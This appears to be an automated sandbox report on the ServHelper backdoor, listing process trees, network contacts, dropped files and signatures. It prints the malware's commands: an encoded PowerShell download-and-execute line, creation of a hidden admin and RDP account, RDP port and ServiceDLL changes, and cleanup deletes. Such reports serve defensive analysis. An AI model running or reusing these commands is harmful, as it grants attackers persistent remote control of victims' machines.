PID 1404 wrote to memory of 3248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3248 wrote to memory of 2256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3248 wrote to memory of 2256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2852 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 3172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3172 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3172 wrote to memory of 3368 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3368 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3368 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 616 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 616 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1748 wrote to memory of 3808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1748 wrote to memory of 3808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 500 wrote to memory of 2512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 500 wrote to memory of 2512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2512 wrote to memory of 3912 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2512 wrote to memory of 3912 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2000 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2000 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2184 wrote to memory of 3476 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2184 wrote to memory of 3476 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3652 wrote to memory of 1324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3652 wrote to memory of 1324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1324 wrote to memory of 2384 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1324 wrote to memory of 2384 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3380 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3380 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3912 wrote to memory of 588 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3912 wrote to memory of 588 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 3772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3772 wrote to memory of 2220 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3772 wrote to memory of 2220 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3808 wrote to memory of 3204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3808 wrote to memory of 3204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe

"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE45.tmp" "c:\Users\Admin\AppData\Local\Temp\lhq4zxin\CSC1FC88830663E45AF842C8B7F5220DB23.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc H9MWIhec /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc H9MWIhec /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc H9MWIhec /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc H9MWIhec

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc H9MWIhec

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc H9MWIhec

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.hostsailor.com udp
N/A 185.117.72.144:8080 speedtest.hostsailor.com tcp
N/A 8.8.8.8:53 sadiviai9d9asd.xyz udp
N/A 194.180.174.20:443 sadiviai9d9asd.xyz tcp

Files

memory/808-114-0x000002695AC70000-0x000002695AC72000-memory.dmp

memory/808-115-0x0000026975290000-0x00000269756B0000-memory.dmp

memory/808-118-0x000002695AC75000-0x000002695AC76000-memory.dmp

memory/808-117-0x000002695AC73000-0x000002695AC75000-memory.dmp

memory/808-119-0x000002695AC76000-0x000002695AC77000-memory.dmp

memory/2852-120-0x0000000000000000-mapping.dmp

memory/2852-125-0x0000022E0D7B0000-0x0000022E0D7B1000-memory.dmp

memory/2852-129-0x0000022E268B0000-0x0000022E268B1000-memory.dmp

memory/2852-130-0x0000022E25D60000-0x0000022E25D62000-memory.dmp

memory/2852-131-0x0000022E25D63000-0x0000022E25D65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/1324-137-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.cmdline

MD5 0334a0d31f037a51598e0811051cb2e6
SHA1 0efae6b6b10bacb9d4ef31fa86dbc489e06918a5
SHA256 55a496494222ca4de90d9791857f0627535de50bc4df063929f42133fc289121
SHA512 79c39640840e7004d8c1526c372e4d8aec2ced9167c3e0c2d72d0237a6c3a3d198f349ff024c589d7cb8d63194e4ef99b5641fd55928b8206caac72731b88f66

\??\c:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/2852-140-0x0000022E25D66000-0x0000022E25D68000-memory.dmp

memory/2148-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lhq4zxin\CSC1FC88830663E45AF842C8B7F5220DB23.TMP

MD5 ab03bfea4a86420ff3861466a14b7468
SHA1 ed4c20e6ef609efcdbb21366a84529f7bb6debd9
SHA256 ff5de951b80826dced583b409701414480f10bbd06785ca8817422643eb8a676
SHA512 bb6ccde3c1492ead794b4c55856e7af30c248fcfc9d33b54dce5be5bded6f86629139b26acbb53bf9d0c2f0e440bd913e6b2e993254cb8aef3863b368dbef87a

C:\Users\Admin\AppData\Local\Temp\RESBE45.tmp

MD5 3bf94725719ec5750b483938d2348d11
SHA1 51e63027827a49e365f6a9b8eacfa1644274ddc2
SHA256 25ccfebd9988deaeaa6475ec0aee5a99b6d6963cbb81696f02e46e5bf00f8633
SHA512 0235d1f1694b13d84b5eebba40c44dda58846d88f6fcfd53848fe1be891fe3bbb37651f4f8990d6bda0b32ca5915c3567dd9c482b192d5b6b4ea1e52b392789d

C:\Users\Admin\AppData\Local\Temp\lhq4zxin\lhq4zxin.dll

MD5 24e035aed3fb84e31fba40ebad14d5fc
SHA1 ff44a45d2b201e9ea0a100fded0bbd7109960732
SHA256 8a0a82a5165e3e99ae434b26d7da61ef3e3c67040dd064a619c19d08891055e6
SHA512 bd1d08e67d574fee2624a3a5ac0abbb250af35799165014811adb896d8060a42d0a827fc2032a8b8db0e8d31807ab05fad260bab3c1ebad71e854587b1586f05

memory/2852-145-0x0000022E0D7F0000-0x0000022E0D7F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 90c8165a2ca1c584008751e6604aac5f
SHA1 c1b2545af59ec7acdec29e91c667aa74a12b9742
SHA256 2099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974
SHA512 9d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0

memory/2852-149-0x0000022E25D68000-0x0000022E25D69000-memory.dmp

memory/2852-152-0x0000022E26EA0000-0x0000022E26EA1000-memory.dmp

memory/2852-153-0x0000022E27230000-0x0000022E27231000-memory.dmp

memory/1788-160-0x0000000000000000-mapping.dmp

memory/1788-168-0x000002974F9F0000-0x000002974F9F2000-memory.dmp

memory/1788-169-0x000002974F9F3000-0x000002974F9F5000-memory.dmp

memory/1788-176-0x000002974F9F6000-0x000002974F9F8000-memory.dmp

memory/2220-203-0x0000000000000000-mapping.dmp

memory/2220-209-0x000001927ABF0000-0x000001927ABF2000-memory.dmp

memory/2220-210-0x000001927ABF3000-0x000001927ABF5000-memory.dmp

memory/2220-237-0x000001927ABF6000-0x000001927ABF8000-memory.dmp

memory/1404-246-0x0000000000000000-mapping.dmp

memory/2220-256-0x000001927ABF8000-0x000001927ABFA000-memory.dmp

memory/1404-257-0x000001749FDF0000-0x000001749FDF2000-memory.dmp

memory/1404-258-0x000001749FDF3000-0x000001749FDF5000-memory.dmp

memory/1404-290-0x000001749FDF8000-0x000001749FDFA000-memory.dmp

memory/1404-289-0x000001749FDF6000-0x000001749FDF8000-memory.dmp

memory/3916-300-0x0000000000000000-mapping.dmp

memory/3456-301-0x0000000000000000-mapping.dmp

memory/3208-302-0x0000000000000000-mapping.dmp

memory/1316-339-0x0000000000000000-mapping.dmp

memory/196-340-0x0000000000000000-mapping.dmp

memory/912-343-0x0000000000000000-mapping.dmp

memory/1404-344-0x0000000000000000-mapping.dmp

memory/3248-345-0x0000000000000000-mapping.dmp

memory/2256-346-0x0000000000000000-mapping.dmp

memory/3508-347-0x0000000000000000-mapping.dmp

memory/3172-348-0x0000000000000000-mapping.dmp

memory/3368-349-0x0000000000000000-mapping.dmp

memory/3648-350-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 615f99f0e93e2cc4c6a3a572835fd63d
SHA1 c383f93e9a47adc4d4b265fadfcc3feaf0980a91
SHA256 bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8
SHA512 dd1196a3067f740be9c8d3cbcfcb7ec511f77daf3ba28929ef8e989597d7a9de5a59e990a7edda5491ef75413967c7db42e6941ec51523428f7fd6a8353f21ba

\Windows\Branding\mediasvc.png

MD5 5b49a655bf1bd6bcb3551bb1cba2a97b
SHA1 a32f1358093e7e3d8ab6abcc286fc2d92a501f78
SHA256 40bbfb4ea867dff557fa9f20ef53d2b31708c847d2c4b601a55f9eabe69c57ca
SHA512 7de6b4bbc1bce7c12a6e7d730f62a6ca33106d9088a0d06e9beba0f94cd8e5a5fcc3d22ebfdcc62467e417dc85f909daf8094b69cd905dfff17fe0981ef7858a

memory/1748-353-0x0000000000000000-mapping.dmp

memory/3808-354-0x0000000000000000-mapping.dmp

memory/2512-355-0x0000000000000000-mapping.dmp

memory/3912-356-0x0000000000000000-mapping.dmp

memory/2184-357-0x0000000000000000-mapping.dmp

memory/3476-358-0x0000000000000000-mapping.dmp

memory/1324-359-0x0000000000000000-mapping.dmp

memory/2384-360-0x0000000000000000-mapping.dmp

memory/3912-361-0x0000000000000000-mapping.dmp

memory/588-362-0x0000000000000000-mapping.dmp

memory/3772-363-0x0000000000000000-mapping.dmp

memory/2220-364-0x0000000000000000-mapping.dmp

memory/3204-365-0x0000000000000000-mapping.dmp

memory/3920-366-0x0000000000000000-mapping.dmp

memory/196-367-0x0000000000000000-mapping.dmp

memory/1308-368-0x0000000000000000-mapping.dmp

memory/1308-379-0x0000022BB3B93000-0x0000022BB3B95000-memory.dmp

memory/1308-377-0x0000022BB3B90000-0x0000022BB3B92000-memory.dmp

memory/1308-384-0x0000022BB3B96000-0x0000022BB3B98000-memory.dmp

memory/1308-435-0x0000022BB3B98000-0x0000022BB3B99000-memory.dmp

memory/3916-448-0x0000000000000000-mapping.dmp

memory/2960-449-0x0000000000000000-mapping.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-09 04:21

Reported

2021-08-09 04:23

Platform

win7v20210410

Max time kernel

124s

Max time network

109s

Command Line

"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"

Signatures

ServHelper

trojan backdoor servhelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c261f65c-c5c5-4ee5-8917-969188840c02 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SI4PKHXK8YLXXEWKMU4Q.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ac43274-53cf-491d-a291-6fa27120fe4c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b25da9f-166d-4992-81ce-f6008985f3df C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80a98c12-462f-4523-a4ff-4fd85ac77c55 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b8840d3-d0ba-40c1-9f14-83e71b26a432 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99079d4f-656b-4ea6-a271-7f41dd686224 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2dc9e65-295b-4a25-9b24-30de871d1037 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_466c1ed4-16fc-42f0-a5cf-9ce89880283a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_515d8fe1-b2f0-42ea-9770-eb3a85b9c8b4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80795e16-a1e7-4269-9c5f-d237f43eef3a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e411422f-c750-4950-8d1e-f80cc9365c29 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073488dd58cd701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243